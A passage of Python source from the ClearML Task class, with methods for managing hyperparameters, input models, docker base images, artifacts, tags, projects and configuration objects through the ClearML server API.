in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
            Default: the model weights filename is used (excluding the file extension)
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
        # The API makes sure we get old parameters with type "legacy" at the top level (instead of nested under "Args")
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
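    # Illustrative usage of get_parameters() (the hyper-parameter name below is
    # made up):
    #   params = task.get_parameters()
    #   batch_size = params.get('Args/batch_size')  # values come back as strings, e.g. '32'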
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
            # If a specific prefix was given and this is a plain set (not an update),
            # overwrite only that prefix's section and leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = str(v) if v else v
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem())
param_type = params_types[org_k] if org_k in params_types else org_param.type
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=str(v) if v else v,
description=descriptions[org_k] if org_k in descriptions else org_param.description,
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
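    # Illustrative usage of set_parameter() (the argument values below are made up):
    #   task.set_parameter('Args/batch_size', 32, description='training batch size', value_type=int)
    #   # stored under section "Args" as the string '32'; description/type require API >= 2.9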
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
        Delete a parameter by its full name, Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
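    # Illustrative usage of delete_parameter() (the parameter name below is made up):
    #   task.delete_parameter('Args/batch_size')  # requires clearml-server API >= 2.9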
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
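    # Illustrative usage of set_model_label_enumeration() (the labels below are made up):
    #   task.set_model_label_enumeration({'background': 0, 'person': 1, 'car': 2})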
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely, the call is ignored.
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
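# Hedged usage sketch (assumes a `task` instance; image and arguments are illustrative):
#   task.set_base_docker(
#       docker_cmd='nvidia/cuda:11.1',
#       docker_arguments='-e ENV=1',
#       docker_setup_bash_script=['apt update', 'apt-get install -y gcc'])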
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
Update the Task's list of artifacts (tasks.Artifact); existing artifacts with matching keys are replaced.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to add to the task.
If an artifact by the same name already exists it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as a blob of text.
:return: The model configuration as a blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return the task status without refreshing the entire Task object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. The default is 0, returning all scalars.
When a sample limit is set, scalar values are averaged inside the sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
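# Hedged sketch for walking the nested scalar dict returned above
# (assumes a `task` instance; titles and series depend on what was reported):
#   scalars = task.get_reported_scalars(max_samples=0, x_axis='iter')
#   for title, series_dict in scalars.items():
#       for series, axes in series_dict.items():
#           print(title, series, list(zip(axes['x'], axes['y']))[:3])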
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
return None if configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (json alike) into stored text
Notice you can either pass `config_text` or `config_dict`, not both
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
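# Hedged sketch (assumes a `task` instance; the section name and dict are illustrative):
#   task.set_configuration_object(name='data_pipeline', config_dict={'lr': 0.001, 'layers': [64, 64]})
#   cfg = task.get_configuration_object_as_dict('data_pipeline')  # parsed back as a dict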
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matches the project_name, return the last updated project.
If no project matches the requested name, return None.
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
:param requirements_file: Optional pass requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
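# Hedged usage sketch; per the docstring above this must be called before `Task.init`:
#   Task.force_requirements_env_freeze(force=True)                            # use pip freeze / conda list
#   Task.force_requirements_env_freeze(requirements_file='requirements.txt')  # use an explicit file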
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
